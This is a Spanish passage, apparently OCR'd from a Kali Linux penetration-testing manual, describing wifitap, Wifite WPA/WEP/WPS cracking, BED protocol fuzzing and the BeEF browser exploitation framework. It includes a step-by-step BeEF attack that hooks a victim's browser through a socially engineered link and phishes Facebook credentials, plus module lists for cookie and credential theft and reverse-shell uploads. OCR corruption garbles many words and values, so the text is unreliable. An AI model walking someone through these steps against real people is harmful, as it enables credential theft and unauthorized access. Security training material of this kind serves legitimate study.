• configurar una dirección IP coherente con el rango de direcciones de red de destino 

• enrutando el tráfico deseado a través de él 

En particular, es un método barato para la inyección de paquetes arbitrarios en paquetes 802.11 sin 
una biblioteca específica. 

Además permitirá deshacerse de cualquier conjunto de limitaciones en el punto de acceso, como 
evitar los sistemas de prevención de comunicaciones entre clientes o alcanzar múltiples SSID 
manejados por el mismo punto de acceso. 

Uso: 

wifitap -b <BSSID> -s <HWSRC> [-o <iface>] [-1 <iface>] [-w <WEP key> [-k <key id>]] 

[-d [-V]] [-h] 

Opciones 


-b <BSSID> 

Especificar BSSID para inyección 

-s <HWSRC> 

Especificar la dirección MAC de origen para 802.11 y los 
encabezados ARP 

-0 <iface> 

Especificar la interfaz para la inyección. Por defecto: athO 

-w <key> 

Modo y clave WEP 

-k <key id> 

ID de clave WEP {0,1,2,3}. Por defecto: 0 

-d 

Activar la depuración 

-V 

Modo verbose 

-h 

Visualizar la ayuda 


wifidns - Herramienta de respuesta DNS de inyección WiEi basada en Wifitap 
Uso: wifidns -b <BSSID> -a <IP> [-o <iface>] [-1 <iface>] [-s <SMAC>] [-t <TTE>] 
[-W <WEP key>] [-k <key id>]] [-d [-v]] [-h] 

Opciones 


-b <BSSID> 

Especificar BSSID para inyección 

-a <IP> 

Especificar la dirección IP para las respuestas DNS 

-t <TTE> 

Establecer TTL. Por defecto: 64 

-0 <iface> 

Especificar la interfaz para la inyección. Por defecto: athO 

-i <iface> 

Especificar la interfaz por donde escuchar. Por defecto: athO 

-s <SMAC> 

Especificar la dirección MAC de origen para los paquetes 
inyectados 

-w <key> 

Modo y clave WEP 





-k <key id> 

ID de clave WEP {0,1,2,3}- Por defecto: 0 

-d 

Activar la depuración 

-V 

Modo verbose 

-h 

Visualizar la ayuda 


wifiping - Herramienta de respuesta basada en inyección WiFi basada en Wifitap 

Uso: wifiping -b <BSSID> [-t <TTL>] [-0 <iface>] [-i <iface>] [-s <SMAC>] [-w <WEP key> 

[-k <key id>]] [-d [-v]] [-h] 

Opciones 


-b <BSSID> 

Especificar BSSID para inyección 

-t <TTL> 

Establecer TTE. Por defecto: 64 

-0 <iface> 

Especificar la interfaz para la inyección. Por defecto: athO 

-i <iface> 

Especificar la interfaz por donde escuchar. Por defecto: athO 

-s <SMAC> 

Especificar la dirección MAC de origen para los paquetes 
inyectados 

-w <key> 

Modo y clave WEP 

-k <key id> 

ID de clave WEP {0,1,2,3}. Por defecto: 0 

-d 

Activar la depuración 

-V 

Modo verbose 

-h 

Visualizar la ayuda 


wifiarp - Herramienta de respuesta basada en inyección WiFi basada en Wifitap 

Uso: wifiarp -b <BSSID> -s <HWSRC> [-0 <iface>] [-i <iface>] [-w <WEP key> [-k <key id>]] 

[-d [-V]] 

Opciones 


-b <BSSID> 

Especificar BSSID para inyección 

-s <HWSRC> 

Especificar la dirección MAC origen y las cabeceras ARP 

-w <key> 

Modo y clave WEP 

-k <key id> 

ID de clave WEP {0,1,2,3}. Por defecto: 0 

-d 

Activar la depuración 

-V 

Modo verbose 

-h 

Visualizar la ayuda 






27. Wifite 


Esta herramienta permite ataear múltiples redes encriptadas WEP, WPAy WPS. Es personalizable 
para ser automatizada con solo unos pocos argumentos. Wifite pretende ser la herramienta de 
auditoria inalámbrica bajo el lema de "configúrelo y olvídelo". 

Características: 

• ordena los objetivos por intensidad de señal (en dB); primero craquea los puntos de acceso 
más cercanos 

• Desactiva automáticamente los clientes de redes ocultas para revelar su SSID 

• Numerosos filtros para especificar exactamente que atacar 

• Configuraciones personalizables (tiempos de espera, paquetes/seg, etc.) 

• Característica "anónima"; cambia la MAC a una dirección aleatoria antes de atacar, luego 
vuelve a cambiar cuando se completan los ataques 

• Todos los handshakes WPA capturados están respaldados en el directorio actual de wifite.py 

• Deshabilitación inteligente de WPA; ciclos entre todos los clientes y programas de difúsión. 

• Posibilidad de detener cualquier ataque con Ctrl + C, con opciones para continuar, continuar 
con el siguiente objetivo, saltar a craqueo o salir 

• Muestra el resumen de la sesión en la salida; muestra cualquier llave rota 

• Todas las contraseñas guardadas en cracked.txt 

Comandos 


—check <file> 

Verifica el archivo <file>,cap para ver si hay handshakes WPA. 

—cracked 

Muestra puntos de acceso previamente craqueados 


Global 


-all 

Atacar todos los objetivos. Por defecto auto 

-i <iface> 

Interfaz inalámbrica por la que capturar. Por defecto auto 

-mac 

Aleatorizar la dirección MAC. Por defecto off 

-c <channel> 

Seleccionar un canal. Por defecto auto 

-e <essid> 

Seleccionar un ESSID. Por defecto auto 

-b <bssid> 

Seleccionar un BSSID. Por defecto auto 

-showb 

Mostrar los BSSID de destino después del escaneo. 

Por defecto off 

-pow <db> 

Ataca a cualquier objetivo con intensidad de señal > <db>. 

Por defecto 0 

-quiet 

No imprimir la lista de AP durante el escaneo. Por defecto off 


WPA 


-wpa 

Solo redes WPA objetivo. Por defecto off 

-wpat <sec> 

Tiempo de espera para que se complete el ataque WPA (segundos). 
Por defecto 500 

-wpadt <sec> 

Tiempo de espera entre el envió de paquetes deauth (segundos). 

Por defecto 10 






-strip 

Romper el handshake usando tshark o pyrit. Por defecto off 

-crack <dic> 

Craquear los handshakesWPA utilizando el archivo de lista de 
palabras <dic>. Por defecto off 

-dict <file> 

Especificar el diccionario a usar cuando se craquea WPA. 

Por defecto phpbb.txt 

-aircrack 

Atacar el handshake usando aircrack. Por defecto on 

-pyrit 

Atacar el handshake usando pyrit. Por defecto off 

-tshark 

Atacar el handshake usando tshark. Por defecto on 

-cowpatty 

Atacar el handshake usando cowpatty. Por defecto off 


WEP 


-wep 

Solo redes WEP de destino. Por defecto off 

-pps <num> 

Establecer el número de paquetes por segundo a inyectar. 

Por defecto 600 

-wept <sec> 

Segundos para esperar entre cada ataque, 0 implica infinito. 

Por defecto 600 

-chopchop 

Elsar el ataque chopchop. Por defecto en 

-arpreplay 

Elsar ataque arpreplay. Por defecto en 

-fragment 

Usar ataque de fragmentación. Por defecto en 

-caffelatte 

Usar el ataque de cafe-latte. Por defecto en 

-p0841 

Utilizar el ataque -p0841. Por defecto en 

-hirte 

Usar el ataque hirte (cfrag). Por defecto on 

-nofakeauth 

Detener el ataque si falla la autenticación falsa. Por defecto off 

-wepca <n> 

Comenzar el craqueo cuando el número de ivs supere n. 

Por defecto 10000 

-wepsave 

Guardar una copia de los archivos .cap en este directorio. 

Por defecto off 


WPS 


-wps 

Solo redes WPS de destino. Por defecto off 

-wpst <sec> 

Espera máxima para un nuevo reintento antes de abandonar. 

El valor 0 significa nunca. Por defecto 660 

-wpsratio <per> 

Relación mínima de intentos de PIN exitosos/intentos totales. 

Por defecto 0 

-wpsretry <num> 

Número máximo de reintentos para el mismo PIN antes de 
abandonar. Por defecto 0 


Ejemplo 1 

Ejecutar wifite sin opciones 

Su funcionamiento consta de los pasos siguientes: 

1. Hace un escaneo de todas las redes wifi detectadas. Visualiza su ESSID, canal, potencia y 
número de clientes conectados a cada una de ellas. 

2. A continuación se selecciona las redes wifi a atacar 





3. Hacer un ataque WPS Pixie.Dust 

4. Haeer un ataque WPS Pin Attack 

5. Haeer una ataque WPA handshake y 

6. Finalmente intenta haeer un eraqueo a partir del ataque WPA handshake 
Ejemplo 2. 

Ejeeutar wifite —eraek 

En este ejemplo busea direetamente los handshakes y euando los ha eneontrado propone 
deseifrarlos eon eowpatty o airerack. 



28. ANÁLISIS DE VULNERABILIDAD 


BED 

Diseñada para fuzz los protocolos en texto plano contra posibles desbordamientos de 
búfer, errores de cadena de formato, desbordamientos de enteros, condiciones DoS y 
asi sucesivamente. 

BeeF 

Herramienta de prueba de penetración que se centra en el navegador web. 

javasnoop 

Permite interceptar métodos, alterar datos y piratear las aplicaciones Java 

wapiti 

Permite auditar la seguridad de los sitios web o aplicaciones web. 




29. BED 


Bruteforce Exploit Detector (BED) es una poderosa herramienta escrita en lenguaje perl y diseñada 
para hacer fuzz a los protocolos contra posibles desbordamientos de búfer, errores de cadena de 
formato, desbordamientos de enteros, condiciones DoS y asi sucesivamente. Prueba 
automáticamente la implementación de un protocolo elegido mediante el envió de diferentes 
combinaciones de comandos con cadenas problemáticas para confundir el objetivo. Eos protocolos 
soportados por esta herramienta son ETP, SMTP, POP, HTTP, IRC, IMAP, PJE, EPD, EINGER, 
SOCKS4y SOCKS5. 

Uso; bed.pl -s <plugin> -t <target> -p <port> -o <timeout> [ depende del plugin ] 

<plugin> = PTP/SMTP/POP/HTTP/IRC/IMAP/PJE/LPD/PINGER/SOCKS4/SOCKS5 
<target> = Dirección IP del dispositivo a verificar. Por defecto; localhost 
<port> = Puerto a conectar. Por defecto; puerto estándar 

<timeout> = segundos para esperar después de cada prueba. Por defecto; 2 segundos 

El módulo FTP necesita los parámetros adicionales 
-u <username> 

-V <password> 

El módulo SMTP necesita el parámetro adicional 
-u <vabd mail address at target host> 

El módulo POP necesita los parámetros adicionales 
-u <username> 

-V <password> 

Sólo -s es una opción obligatoria. 


Ejemplo 

root@kali;~# bed -s http -t 216.58.210.238 


BED 0.5 by mjm ( www.codito.de ) & cric ( www.snake-basket.de ) 


+ Buflfer overfiow testing; 

testing; 1 
testing; 2 
testing; 3 
testing; 4 
testing; 5 
testing; 6 
testing; 7 
testing; 8 
+ Formatstring testing; 

testing; 1 
testing; 2 
testing; 3 
testing; 4 
testing; 5 
testing; 6 


HEAD XAXAX HTTP/1.0 

HEAD / XAXAX . 

GET XAXAX HTTP/1.0 

GET / XAXAX . 

POST XAXAX HTTP/1.0 

POST / XAXAX . 

GET /XAXAX . 

POST /XAXAX . 

HEAD XAXAX HTTP/1.0 
HEAD / XAXAX 
GET XAXAX HTTP/1.0 
GET / XAXAX 
POST XAXAX HTTP/1.0 
POST / XAXAX 

















testing: 7 
testing: 8 

* Normal tests 

+ Buífer overflow testing: 

testing: 1 
testing: 2 
testing: 3 
testing: 4 
testing: 5 
testing: 6 
testing: 7 
testing: 8 
testing: 9 
testing: 10 
testing: 11 
testing: 12 
testing: 13 
testing: 14 
testing: 15 
testing: 16 
testing: 17 

+ Formatstring testing: 

testing: 1 
testing: 2 
testing: 3 
testing: 4 
testing: 5 
testing: 6 
testing: 7 
testing: 8 
testing: 9 
testing: 10 
testing: 11 
testing: 12 
testing: 13 
testing: 14 
testing: 15 
testing: 16 
testing: 17 

+ Unieode testing: 

testing: 1 
testing: 2 
testing: 3 
testing: 4 
testing: 5 
testing: 6 
testing: 7 
testing: 8 
testing: 9 
testing: 10 
testing: 11 
testing: 12 


GET/XAXAX 
POST /XAXAX 


User-Agent: XAXAX. 

Host: XAXAX . 

Aeeept: XAXAX . 

Aeeept-Eneoding: XAXAX 
Accept-Eanguage: XAXAX 
Accept-Charset: XAXAX 

Conneetion: XAXAX. 

Referer: XAXAX . 

Authorization: XAXAX 

Erom: XAXAX . 

Charge-To: XAXAX . 

Authorization: XAXAX 
Authorization: XAXAX : foo 
Authorization: foo : XAXAX 
If-Modified-Sinee: XAXAX 

ChargeTo: XAXAX . 

Pragma: XAXAX . 

Eiser-Agent: XAXAX. 

Host: XAXAX 
Aeeept: XAXAX 
Accept-Encoding: XAXAX 
Aeeept-Eanguage: XAXAX 
Aeeept-Charset: XAXAX 

Conneetion: XAXAX. 

Referer: XAXAX 
Authorization: XAXAX 
Erom: XAXAX 

Charge-To: XAXAX . 

Authorization: XAXAX 
Authorization: XAXAX : foo 
Authorization: foo : XAXAX 
If-Modified-Sinee: XAXAX 

ChargeTo: XAXAX . 

Pragma: XAXAX . 

User-Agent: XAXAX. 

Host: XAXAX 
Aeeept: XAXAX 
Aeeept-Eneoding: XAXAX 
Accept-Eanguage: XAXAX 
Accept-Charset: XAXAX 

Conneetion: XAXAX. 

Referer: XAXAX 
Authorization: XAXAX 
Erom: XAXAX 

Charge-To: XAXAX . 

Authorization: XAXAX 



















































testing: 13 

Authorization: XAXAX : foo. 

testing: 14 

Authorization: foo : XAXAX. 

testing: 15 

If-Modified-Sinee: XAXAX . 

testing: 16 

ChargeTo: XAXAX . 

testing: 17 

Pragma: XAXAX . 

+ random number testing: 

testing: 1 

User-Agent: XAXAX. 

testing: 2 

Host: XAXAX . 

testing: 3 

Accept: XAXAX . 

testing: 4 

Accept-Encoding: XAXAX . 

testing: 5 

Aceept-Language: XAXAX . 

testing: 6 

Aeeept-Charset: XAXAX . 

testing: 7 

Conneetion: XAXAX. 

testing: 8 

Referer: XAXAX . 

testing: 9 

Authorization: XAXAX . 

testing: 10 

From: XAXAX . 

testing: 11 

Charge-To: XAXAX . 

testing: 12 

Authorization: XAXAX . 

testing: 13 

Authorization: XAXAX : foo. 

testing: 14 

Authorization: foo : XAXAX. 

testing: 15 

If-Modified-Since: XAXAX . 

testing: 16 

ChargeTo: XAXAX . 

testing: 17 

Pragma: XAXAX . 

+ testing mise strings 1: 

testing: 1 

User-Agent: XAXAX. 

testing: 2 

Host: XAXAX . 

testing: 3 

Aceept: XAXAX . 

testing: 4 

Aceept-Encoding: XAXAX . 

testing: 5 

Accept-Eanguage: XAXAX . 

testing: 6 

Aeeept-Charset: XAXAX . 

testing: 7 

Conneetion: XAXAX. 

testing: 8 

Referer: XAXAX . 

testing: 9 

Authorization: XAXAX 

eonnection attempt failed: No route to host 


































30. BeEF 


BeEF es la abreviatura de Browser Exploitation Eramework. Es una herramienta de prueba de 
penetración que se centra en el navegador web. En medio de las crecientes preocupaciones sobre los 
ataques web contra clientes, incluidos los clientes móviles, BeEE permite al probador de 
penetración profesional, evaluar la seguridad real de un entorno objetivo mediante el uso de 
vectores de ataque del lado del cliente. A diferencia de otros marcos de seguridad, BeEE pasa el 
perímetro de la red y el sistema cliente y examina la capacidad de explotación dentro del contexto 
de la puerta abierta: el navegador web. 

Entre todas las acciones que puede ejecutar contra el navegador web de destino conectado, 
también hay las siguientes: registrador del teclado, escáner de puertos, herramienta de explotación 
del navegador, proxy web, etc. 

BeEE se conectará a uno o más navegadores web y los utilizará como cabezas de playa para lanzar 
módulos de comandos dirigidos y más ataques contra el sistema desde el contexto del navegador. 

Un usuario puede ser engañado a engancharse abriendo una URL personalizada que se le ha 
enviado y continuar viendo el tráfico web tipleo, mientras un atacante tiene acceso a la sesión del 
usuario. BeEF evade los dispositivos de seguridad de red y las aplicaciones de antivirus basadas en 
dispositivo dirigidas a vulnerabilidades encontradas en navegadores comunes. A diferencia de otros 
marcos de seguridad, BeEF sobrepasa el perímetro de red reforzado y el sistema del cliente y 
examina la explotabilidad en el contexto de la puerta abierta: el navegador web. 

30.1. Inicio 

Para iniciar el servidor BeEF, se recomienda ejecutar en la máquina atacante 
beef-xss -x 

porque esto también inicia el necesario SQLite DB. Lo que se ve es lo siguiente 

rooti^kali:-# beef-xss -x 
[i] GeoIP database is missing 

[i] Run geoipupFecha to download / upFecha Maxmind GeoIP database 

[*] Picase wait for the BeEF Service to start. 

[.] 

[*] You might need to refresh your browser once it opens. 

[*] 

[*] Web UI: http://127.0.0.1:3000/ui/panel 

[*] Hook: <script src="http://<IP>:3000/hook.js"></script> 

[*] Example: <script src=’’ http://127.0.0.1:3000/hook.js ’’></script> 
beef-xss.Service - beef-xss 

Loaded: loaded (/lib/systemd/systemA)eef-xss.Service; disabled; vendor preset: disabled) 

Active: active (running) since Sun 2020-04-05 17:40:41 BST; 5s ago 
Main PID: 1721 (ruby) 

Tasks: 2 (limit: 4915) 

Memory: 35.7M 

CGroup: /system.slice/beef-xss.Service 

'—1721 ruby/usr/share^eef-xss/beef 



Apr 05 17:40:41 kali systemd[l]: Started beef-xss. 

[*] Opening Web U1 (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1... 


A continuación ejecutar en el navegador http://<lP atacante>:3000/ui/panel y entrar con el usuario y 
la contraseña establecida. 

A partir de aqui hay 2 caminos: 

1. Verificar si la máquina atacante funciona correctamente con los ejemplos que incluye 

2. Enviar de alguna manera el comando http://192.168.1.5/demos/butcher/index.html a una victima, 
para que en el momento que active esta URL, aparecerá en la parte izquierda con un icono de la 
victima y su dirección IP y a partir de aqui el atacante podrá piratear la máquina de la victima. 

Todo esto sirve para el caso de que el atacante y la victima estén en la misma LAN y si no es el 
caso, la máquina atacante deben estar en un servidor web para que pueda acceder a ella desde 
cualquier red de cualquier sitio del mundo a través de Internet. 

30.2. Conguración 

El fichero de conguración general se llama config.yaml y su contenido es el siguiente 


beef: 

versión: 0.4.7.3-alpha 
debug: false 
client debug: false 
crypto_default_value_length: 80 
credentials: 

user: beef 
passwd: '1234' 
restrictions: 

permittedhookingsubnet: 

- O.O.O.O/O 

- "::/ 0 " 

permitteduisubnet: 

- O.O.O.O/O 

- "::/ 0 " 

api attempt delay: '0.05' 

http: 

debug: false 
host: 0.0.0.0 
port: '3000' 

xhr_poll_timeout: 1000 

hook file: "/hook.js" 

hook session name: BEELHOOK 

restfulapi: 

allow cors: false 

cors allowed domains: http://browserhacker.com 
websocket: 

enable: false 
port: 61985 
secure: true 
secure_port: 61986 



ws_poll_timeout: 1000 
ws connect timeout: 500 
webserverimitation: 
enable; true 
type: apache 
hook_404: false 
hook root: false 
https: 

enable; false 
key: beef_key.pem 
eert; beef eert.pem 
database: 
driver: sqlite 
db file: db/beef db 
db host: loealhost 
db_port: 3306 
db name; beef 
db user: beef 
db_passwd; beef 
db eneoding: UTF-8 
autorun: 

result_poll_interval: 300 
result_poll_timeout: 5000 
continue after timeout: true 
dns hostname lookup: false 
geoip: 
enable: true 

database: "/var/lib/GeolP/GeoLite2-City.mmdb" 
integration: 
phishing_frenzy: 

enable: false 
extensión; 
adminui: 

enable: true 
base_path: "/ui" 
demos: 

enable: true 
events: 

enable: true 
evasión: 

enable: false 
requester: 

enable; true 
proxy: 

enable: true 
network: 

enable: true 
metasploit: 

enable; false 
soeialengineering: 
enable; true 


xssrays: 



enable; true 


En este fiehero se espeeifica el usuario y la contraseña en el inicio del arranque del servidor, en este 
caso el usuario es beef y la contraseña 1234 

También se establecen los números de los puertos a utilizar en cada caso, así como la activación de 
cada una de las extensiones: requester, proxy, metasploit, social engineering, evasión y consolé. 

Para activar el metasploit se debe establecer: 

extensión: 

adminui: 

metasploit: 

enable: true 


y a continuación 

ñame:' Metasploit' 
enable: true 
host: "127.0.0.1" 
port: 55552 
user: "msf 
pass: <contraseña> 
uri:' /api' 
ssl: true 

ssl version: ' TEST 
ssl_verify: true 
callback host: "127.0.0.1" 
autopwn url: "autopwn" 

30.3. Ejecución 

Actualmente hay 2 páginas de demostración disponibles en el marco de BeEE y se muestran a 
continuación: 

a. Página de demostración básica 


Cuando se carga la página web en la imagen de arriba, nuestro navegador web ya está enganchado 
al marco BeEE y podemos ejecutar módulos contra él. Eos enlaces y formularios adicionales están 
presentes para fines de demostración de las diversas características del marco BeEE. Todo lo que es 
importante es que al visitar la página web anterior, el navegador se conecta automáticamente al 
BeEE. 

b. Página de demostración butcher 

Este ejemplo también conecta automáticamente el navegador web al BeEE, por lo que no se 
requieren pasos adicionales. Eos elementos adicionales en la página web es solo para fines 
demostrativos. 

En el lado izquierdo del panel de interfaz de usuario de BeEE, podemos ver "Online Navegadores" y 
"Ofíline Navegadores", que representan los navegadores enganchados, algunos de los cuales están 
en línea y los otros son offline. Esto depende de la actividad de sondeo del navegador web de la 
víctima. 



La página web de inieio también establece que podemos comunicarnos con el navegador 
enganchado haciendo clic en uno de los navegadores, sobre el cual aparecerá una nueva pestaña y 
aparecerá como la imagen siguiente: 


Podemos ver que cada pestaña representa las características del navegador seleccionado y son las 5 
pestañas siguintes: 

1 .Details 

Muestra información sobre el navegador seleccionado, que podemos ver en la imagen. 

2.Logs 

Muestra las entradas de registro del navegador seleccionado. Podemos ver esta pestaña representada 
en la imagen siguiente: 

S.Commands 

Aqui podemos ejecutar los módulos contra un navegador web seleccionado. Los módulos pueden 
ejecutarse con cualquier comando que se pueda lograr a través de JavaScript. Cada uno de los 
módulos tiene un icono representado con uno de los colores listados a continuación: 

• Verde: funciona contra el objetivo; invisible para el usuario. 

• Naranja: funciona contra el objetivo; visible para el usuario. 

• Gris: aún debe verificarse contra el objetivo. 

• Rojo: no funciona contra el objetivo. 

Podemos ver esta pestaña representada en la imagen siguiente y en ella se ha seleccionado el 
módulo “Browser - Hooked Domain - Play Sound” 

Las principales carpetas de módulos son: Browser, Chrome Extensions, Debug, Exploits, Host, 
IPEC, Metasploit, Mise, Network, Persistence, Phonegap y Social Engineering 

d.Rider 

Esta pestaña nos permite enviar solicitudes HTTP arbitrarias al navegador seleccionado. 
ó.XssRays 

Esta pestaña se puede usar para verificar si la página donde está enganchado el navegador es 
vulnerable al ataque XSS. Si hacemos clic derecho en el navegador conectado, se abre un menú 
dándonos 2 opciones para elegir: 

• Usar como proxy: Esta opción nos permite usar el navegador conectado como proxy. 

• Iniciar XssRays en el dominio enganchado. Esto inicia el descubrimiento de 
vulnerabilidades XSS en la página web. 

30.4. Ataque 

A continuación se explican los pasos a seguir para mostrar como ejecutar un ataque exitoso del 
navegador web usando BeEE y lo importante que es tener un antivirus actualizado corriendo para 
que su ordenador detecte el ataque del navegador web usando BeEE. 

En este caso ambas máquinas, la atacante y la victima están en la misma LAN, una con Kali Linux 
y la otra con sistema operativo Windows respectivamente. 

Primero utilizar Terminal en Kali Linux para ejecutar el marco de BeEE, el atacante deberá iniciar 
sesión en Kali Einux y luego navegar al directorio "beef-xss" y ejecute el script "beef como se 
muestra arriba. 

Como se puede ver en la captura de pantalla anterior, BeEE ha sido lanzado con éxito. Usar la URL 
resaltada para abrir la página de inicio de sesión de BeEE en el navegador del atacante. 



Una vez que se haya lanzado BeEF, lo siguiente será iniciar sesión en la interfaz de usuario como se 
ve arriba. En este caso el nombre de usuario es “beef’ y la contraseña es "1234". 


La imagen de arriba es la página de inicio de BeEF con 2 enlaces resaltados. Cualquiera de los 
enlaces se puede usar para enganchar al navegador de la victima. Asegurarse de reemplazar la 
dirección IP del enlace de 127.0.0.1 a la dirección IP de su atacante, en este caso 192.168.2.171. 


Ahora se trata de enviar de alguna manera el comando http://192.168.1.5/demos/butcher/index.html 
a una victima, para que en el momento que active esta URL, aparecerá en la parte izquierda con un 
icono de la victima y su dirección IP y a partir de aqui el atacante podrá pbatear la máquina de la 
victima. En este caso, ejecutar esta dirección URL en la máquina victima. 

Supongamos que se ha tiene éxito golpeando a su victima para hacer clic en su enlace mediante 
correo electrónico u otro método de ingeniería social. El sistema de la victima estará enganchado 
como lo ilustra la siguiente imagen. 

Como se puede ver en la captura de pantalla anterior, el navegador se está ejecutando en la máquina 
de la victima con la dirección IP 192.168.2.174. 


A partir de aqui podemos attivar alguno de los módulos de BeEF y en este caso lo haremos con el 
módulo Pretty Theft. 


En la figua anterior, en el lado derecho, es donde ingresamos la información de la máquina atacante 
que ejecuta el servicio beef Asegúrese de reemplazar la dirección IP predeterminada en el logotipo 
personalizado con la dirección IP de la VM del atacante, en este caso 192.168.2.171, antes de 
ejecutar. 

Para ejecutar el ataque, simplemente hacemos clic en ejecutar como se muestra en la figura anterior. 

Una vez que hemos hecho clic en ejecutar, la pantalla de autenticación Facebook Face se desplazará 
a la máquina de la victima. 

Mirando la parte elevada a la derecha de la captura de pantalla en la figura anterior, indica los datos 
de inicio de sesión capturados, es decir, el nombre de usuario y contraseña de la victima para 
Facebook. 



30.5. 


Módulos 


La lista de módulos es la siguiente; 

Browser 

1 .Browser Fingerprinting 

Objeetivo: Fingerprint de la versión del navegador eomprobando la preseneia de las 
imágenes del navegador. 

Fecha: Setiembre 2011 
Autor: bcoles 

Navegadores: lE, Safari, Firefox 
2.Detect Firebug 

Objeetivo: Este módulo verifica si la extensión Mozilla Eirefox Eirebug se está 
utilizando para inspeccionar la ventana actual. 

Eecha: Eebrero 2012 
Autor; bcoles 
Navegadores: Eirefox 
S.Detect Popup block 

Objeetivo: Detecta si el bloqueador de ventanas emergentes está habilitado. 

Autor: wade 
Navegadores: todos 
d.Detect Unsafe ActiveX 

Objeetivo; Este módulo verificará si lE se ha configurado de forma insegura. Probará 
si la opción Inicialize y los controles ActiveX de script no están marcados como 
seguros para los Scripts. 

Pecha: Enero 2012 
Autors: wade, bcoles 
Navegadores: lE 
5.Get Visited Domains 

Objeetivo; Este módulo recuperará la extracción rápida del historial a través del 
tiempo de caché no destructivo. 

Pecha: Marzo 2012 
Autor: keith lee 
Navegadores: Eirefox / lE 
ó.Detect Visited URL 

Objeetivo: Este módulo detectará si el navegador conectado ha visitado o no las URE 

especificadas 

Pecha: Diciembre 2011 

Autor; passbe 

Navegadores: IE6:7 / Eirefox 3 / Chrome 1:5 / Safari 3 / Opera 1:10 
V.Play Sound 

Objeetivo: Este módulo reproduce un sonido en el navegador 
Pecha: Diciembre 2011 
Autor: Saafan 
Navegadores: Todos 
8.T Jnhook 

Objeetivo: Este módulo elimina el BeEP enganchado de la página enganchada. 
Pecha: Eebrero 2012 
Autor: bcoles 
Navegadores: Todos 
O.Webcam 


Objectivo: Este módulo mostrará al usuario el diálogo ’Allow Webeam' de Adobe 
Flash. El usuario debe hacer clic en el botón Allow, de lo contrario este módulo no 
devolverá imágenes. El título /text para convencer al usuario se puede personalizar. 
Fecha: Junio 2012 
Autor: floyd 
Navegadores: Todos 

10. Get Firefox/Chrome Extensions 

Objectivo: Detectar las extensiones de Chrome y Firefox 
Autors: koto, bcoles, nbblrr 
Navegadores: Chrome <18, Firefox < 50 

11. Detect MS Ofíice Versión 

Objectivo: Detectar la versión de MS Office desde ActiveX 
Fecha: Junio 2013 
Autor: Nbblrr 
Navegadores: lE 
Hooked Domain 

1 .AJAX Fingerprint 

Objectivo: Fingerprint Ajax y las librerías JS presentes en la página enganchada. 
Autor: qswain 

Navegadores: Firefox, Safari 

2. Alert Dialog 

Objectivo: Envía un cuadro de diálogo de alerta al navegador conectado. 

Autor: wade, bm 
Navegadores: Todos 

3. Deface Web Page 

Objectivo: Sobrescribe la página, el título y el icono de acceso directo en la página 
enganchada. 

Autor: antisnatchor 
Navegadores: Todos 

4. Get Cookie 

Objectivo: Este módulo recuperará la cookie de sesión de la página actual. 

Autor: bcoles 
Navegadores: Todos 

5. Get Focal Storage 

Objectivo: Extrae los datos del objeto HTMF5 localStorage. 

Autor: bcoles 

Navegadores: Internet Explorer 8+, Firefox 4+, opera 11+, Chrome 4+, Safari 4+ 
ó.Get Page HTMF 

Objectivo: Este módulo recuperará el HTMF de la página actual. 

Autor: bcoles 
Navegadores: Todos 
V.Get Page Finks 

Objectivo: Este módulo recuperará el HREF de la página objetivo. 

Autor: vo 

Navegadores: Todos 

8. Get Session Storage 

Objectivo: Extrae los datos del objeto HTME5 sessionStorage. 

Autor: bcoles 

Navegadores: lE 8+, Firefox 4? Opera 11+, Safari 4+ 

9. Get Stored Credentials 

Objectivo: Extrae las credenciales guardadas en el navegador 
Autor: bcoles 


Navegadores: Firefox 
lO.Link Rewrite 

Objectivo: Reescribe todos los enlaces a una URL 
Autor: passbe 
Navegadores: Todos 
11 .Link Rewrite (HTTPS) 

Objectivo: Reemplaza todos los enlaces HTTPS a HTTP 
Autor: bcoles 
Navegadores: Todos 

12. Link Rewrite (TEL) 

Objectivo: Reemplaza todos los enlaces a un número de teléfono 
Autor: bcoles 
Navegadores: Todos 

13. Link Rewrite (Clicked Event) 

Objectivo: Reemplaza todos los enlaces a un enlace especificado 
Autor: xntrik, @bilawalhameed, passbe 
Navegadores: Todos excepto Obróme 

14. Create Alert Dialog 

15. Create Prompt Dialog 

Objectivo: Crear un diálogo prompt 
Autor: wade, bm 
Navegadores: Todos 
ló.Redirect Browser 

Objectivo: Redirecciona la página enganchada 
Autor: wade, vo 
Navegadores: Todos 
IV.Redirect Browser (Rickroll) 

Objectivo: Reemplaza el cuerpo de la página con una pantalla completa Rickroll 
Autor: Yori Kvitchko 
Navegadores: Todos 
IS.Redirect Browser (iErame) 

Objectivo: Reemplaza el contenido de la página con otra URL con un iErame 
Autor: ethicalhackSr, Yori Kvitchko 
Navegadores: Todos 

19. Replace Component (Deface) 

Objectivo: Reemplazar el contenido de un componente especifico de la página 
Autor: antisnatchor, xntrik 
Navegadores: Todos 

20. Replace Videos 

Objectivo: Reemplazar un video incrustado con el propio 
Autor: Yori Kvitchko, antisnatchor 
Navegadores: Todos 
2 Líos Address Bar Spoofing 

Objectivo: Reescribir un enlace URL real seleccionado con una URL falsa 
Autor: bcoles, xntrik, majorsecurity.net 
Navegadores: Safari <=5.1 
Chrome Extensions 

1 .Execute On Tab 
2.Get All Cookies 

Objectivo: Robar cookies 
Autor: mh 

Navegadores: Chrome 


3.Grab Google Contacts 

Objectivo: Obtener los contactos de Google contacts 
Autor; Kos, antisnatchor 
Navegadores: Chrome 
d.Inject BeEF 
S.Screenshot 

Objectivo: Tomar una captura de pantalla de la pestaña actual 
Autor: mh 

Navegadores: Chrome 
ó.Send Gvoice SMS 

Objectivo: Enviar un mensaje de texto SMS a través de la cuenta de Google Volee 

de la victima 

Autor; Kos, antisnatchor 

Navegadores: Chrome 

Debug 

1 .Return Ascii Chars 

Objectivo: Devuelve el conjunto de caracteres ASCII 
Autor: wade 
Navegadores: Todos 

2. Test NetWork Request 

Objectivo: Prueba la función beef net.request recuperando una URE 
Autor: bcoles 
Navegadores: Todos 

3. Test Returning Results 

Objectivo: Devuelve una cadena de la longitud especificada 
Autor: wade 
Navegadores: Todos 

Exploits 

1 .ColdFusion Directory Traversal Expíoit 

2. GlassEish WAR Upload XSRE 

Objectivo: Despliega un archivo WAR malicioso en un Oracle GlassEish Server 3.1.1 

Autor: Bart Eeppens 

Navegadores: Eirefox, Safari, Chrome 

3. Jboss 6.0.0M1 JMX Deploy Exploit 
d.Spring Eramework Malicious Jar Exploit 
ó.VTiger CRM Upload Exploit 

Objectivo: Explota VTiger CRM 5.0.4 y carga un shell inverso 
Autor: wade, bm, pipes, xntrik, yorikv 
Navegadores: Todos 
